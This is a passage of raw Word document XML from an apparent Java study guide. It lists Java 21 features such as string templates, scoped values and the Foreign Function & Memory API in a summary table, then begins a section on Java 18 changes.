    <w:p w14:paraId="34825B99" w14:textId="77777777" w:rsidR="006E5DBD" w:rsidRPr="00CE4B95" w:rsidRDefault="006E5D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6658876"/>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Java"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21DB8E2B" w14:textId="3BB20D30" w:rsidR="006E5DBD" w:rsidRPr="00CE4B95" w:rsidRDefault="006E5D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6658876"/>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messag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Welcome to \{name} 21!"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0465AE18" w14:textId="77777777" w:rsidR="004C7B2C" w:rsidRPr="00CE4B95" w:rsidRDefault="004C7B2C" w:rsidP="004C7B2C">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Makes dynamic strings concise and readable.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BD4886A" w14:textId="77777777" w:rsidR="004C7B2C" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="004C7B2C">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:pict w14:anchorId="06B92855">
          <v:rect id="_x0000_i1803" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="33821F1A" w14:textId="77777777" w:rsidR="004C7B2C" w:rsidRPr="00CE4B95" w:rsidRDefault="004C7B2C" w:rsidP="004C7B2C">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6. Scoped Values (JEP 446 - Preview)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21F0050F" w14:textId="77777777" w:rsidR="004C7B2C" w:rsidRPr="00CE4B95" w:rsidRDefault="004C7B2C" w:rsidP="004C7B2C">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>A safer alternative to thread-local variables, designed to work with virtual threads.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FFED769" w14:textId="77777777" w:rsidR="004C7B2C" w:rsidRPr="00CE4B95" w:rsidRDefault="004C7B2C" w:rsidP="004C7B2C">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Used for managing thread-local-like state safely in a structured way.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E9A8B25" w14:textId="77777777" w:rsidR="004C7B2C" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="004C7B2C">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:pict w14:anchorId="084CF0DE">
          <v:rect id="_x0000_i1804" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="49D8E687" w14:textId="77777777" w:rsidR="004C7B2C" w:rsidRPr="00CE4B95" w:rsidRDefault="004C7B2C" w:rsidP="004C7B2C">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>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7. Foreign Function &amp; Memory API (JEP 442 - 3rd Preview)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2110ABF3" w14:textId="77777777" w:rsidR="004C7B2C" w:rsidRPr="00CE4B95" w:rsidRDefault="004C7B2C" w:rsidP="004C7B2C">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Modern and safe access to native code, replacing JNI.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17A15A21" w14:textId="77777777" w:rsidR="004C7B2C" w:rsidRPr="00CE4B95" w:rsidRDefault="004C7B2C" w:rsidP="004C7B2C">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Supports calling native libraries and allocating off-heap memory.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="240B5717" w14:textId="77777777" w:rsidR="004C7B2C" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="004C7B2C">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:pict w14:anchorId="0AC119AB">
          <v:rect id="_x0000_i1805" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6218E28C" w14:textId="77777777" w:rsidR="004C7B2C" w:rsidRPr="00CE4B95" w:rsidRDefault="004C7B2C" w:rsidP="004C7B2C">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8. Deprecations &amp; Removals</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FB802DA" w14:textId="77777777" w:rsidR="004C7B2C" w:rsidRPr="00CE4B95" w:rsidRDefault="004C7B2C" w:rsidP="004C7B2C">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Finalization is deprecated for removal.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="015257EA" w14:textId="77777777" w:rsidR="004C7B2C" w:rsidRPr="00CE4B95" w:rsidRDefault="004C7B2C" w:rsidP="004C7B2C">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Legacy APIs are cleaned and marked deprecated for future removal.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F036314" w14:textId="77777777" w:rsidR="004C7B2C" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="004C7B2C">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:pict w14:anchorId="2D025E42">
          <v:rect id="_x0000_i1806" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FFCE383" w14:textId="77777777" w:rsidR="004C7B2C" w:rsidRPr="00CE4B95" w:rsidRDefault="004C7B2C" w:rsidP="004C7B2C">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
        </w:rPr>
        <w:t>✅</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>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01"/>
        <w:gridCol w:w="4638"/>
      </w:tblGrid>
      <w:tr w:rsidR="004C7B2C" w:rsidRPr="00CE4B95" w14:paraId="713DD1EA" w14:textId="77777777" w:rsidTr="004C7B2C">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="33B0F773" w14:textId="77777777" w:rsidR="004C7B2C" w:rsidRPr="00CE4B95" w:rsidRDefault="004C7B2C" w:rsidP="004C7B2C">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Feature</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2711CEF8" w14:textId="77777777" w:rsidR="004C7B2C" w:rsidRPr="00CE4B95" w:rsidRDefault="004C7B2C" w:rsidP="004C7B2C">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Description</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004C7B2C" w:rsidRPr="00CE4B95" w14:paraId="51BF8F84" w14:textId="77777777" w:rsidTr="004C7B2C">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6BAAE555" w14:textId="77777777" w:rsidR="004C7B2C" w:rsidRPr="00CE4B95" w:rsidRDefault="004C7B2C" w:rsidP="004C7B2C">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Virtual Threads</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="162CDA4E" w14:textId="77777777" w:rsidR="004C7B2C" w:rsidRPr="00CE4B95" w:rsidRDefault="004C7B2C" w:rsidP="004C7B2C">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Lightweight threads for scalable concurrency</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004C7B2C" w:rsidRPr="00CE4B95" w14:paraId="415B57A1" w14:textId="77777777" w:rsidTr="004C7B2C">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3CF1A919" w14:textId="77777777" w:rsidR="004C7B2C" w:rsidRPr="00CE4B95" w:rsidRDefault="004C7B2C" w:rsidP="004C7B2C">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Record Patterns</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1DF0FE5F" w14:textId="77777777" w:rsidR="004C7B2C" w:rsidRPr="00CE4B95" w:rsidRDefault="004C7B2C" w:rsidP="004C7B2C">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Deconstruction of record types</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004C7B2C" w:rsidRPr="00CE4B95" w14:paraId="03829C96" w14:textId="77777777" w:rsidTr="004C7B2C">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="683DA283" w14:textId="77777777" w:rsidR="004C7B2C" w:rsidRPr="00CE4B95" w:rsidRDefault="004C7B2C" w:rsidP="004C7B2C">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Pattern Matching for switch</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1F90726E" w14:textId="77777777" w:rsidR="004C7B2C" w:rsidRPr="00CE4B95" w:rsidRDefault="004C7B2C" w:rsidP="004C7B2C">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Type-safe, expressive switch</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004C7B2C" w:rsidRPr="00CE4B95" w14:paraId="316EE34E" w14:textId="77777777" w:rsidTr="004C7B2C">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="44BDE9ED" w14:textId="77777777" w:rsidR="004C7B2C" w:rsidRPr="00CE4B95" w:rsidRDefault="004C7B2C" w:rsidP="004C7B2C">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Sequenced Collections</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="44C41538" w14:textId="77777777" w:rsidR="004C7B2C" w:rsidRPr="00CE4B95" w:rsidRDefault="004C7B2C" w:rsidP="004C7B2C">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Ordered collections with first/last semantics</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004C7B2C" w:rsidRPr="00CE4B95" w14:paraId="48D68AAC" w14:textId="77777777" w:rsidTr="004C7B2C">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0612F8A3" w14:textId="77777777" w:rsidR="004C7B2C" w:rsidRPr="00CE4B95" w:rsidRDefault="004C7B2C" w:rsidP="004C7B2C">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>String Templates (Preview)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="20D93BC4" w14:textId="77777777" w:rsidR="004C7B2C" w:rsidRPr="00CE4B95" w:rsidRDefault="004C7B2C" w:rsidP="004C7B2C">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Interpolated strings like ${} syntax</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004C7B2C" w:rsidRPr="00CE4B95" w14:paraId="6DDD4C54" w14:textId="77777777" w:rsidTr="004C7B2C">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6992B25D" w14:textId="77777777" w:rsidR="004C7B2C" w:rsidRPr="00CE4B95" w:rsidRDefault="004C7B2C" w:rsidP="004C7B2C">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Scoped Values (Preview)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3BD1775F" w14:textId="77777777" w:rsidR="004C7B2C" w:rsidRPr="00CE4B95" w:rsidRDefault="004C7B2C" w:rsidP="004C7B2C">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Safe alternative to ThreadLocal</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004C7B2C" w:rsidRPr="00CE4B95" w14:paraId="4B4604A5" w14:textId="77777777" w:rsidTr="004C7B2C">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5DC62408" w14:textId="77777777" w:rsidR="004C7B2C" w:rsidRPr="00CE4B95" w:rsidRDefault="004C7B2C" w:rsidP="004C7B2C">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Foreign Function &amp; Memory API</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="156127F1" w14:textId="77777777" w:rsidR="004C7B2C" w:rsidRPr="00CE4B95" w:rsidRDefault="004C7B2C" w:rsidP="004C7B2C">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Call native functions, work with memory safely</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="59F82014" w14:textId="40B69032" w:rsidR="004C7B2C" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="004C7B2C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:pict w14:anchorId="31A92328">
          <v:rect id="_x0000_i1807" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DC18FCB" w14:textId="77777777" w:rsidR="00370A89" w:rsidRPr="00CE4B95" w:rsidRDefault="00370A89">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="255" w:name="_Toc196307735"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What is the added version after Java 17 to Java 21?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="255"/>
    </w:p>
    <w:p w14:paraId="788CF291" w14:textId="2C236C08" w:rsidR="00946177" w:rsidRPr="00827C56" w:rsidRDefault="00946177" w:rsidP="00827C56">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00827C56">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>✅</w:t>
      </w:r>
      <w:r w:rsidRPr="00827C56">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Java 18 (March 2022)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5242AE78"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b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>UTF-8 by Default</w:t>
      </w:r>
    </w:p>
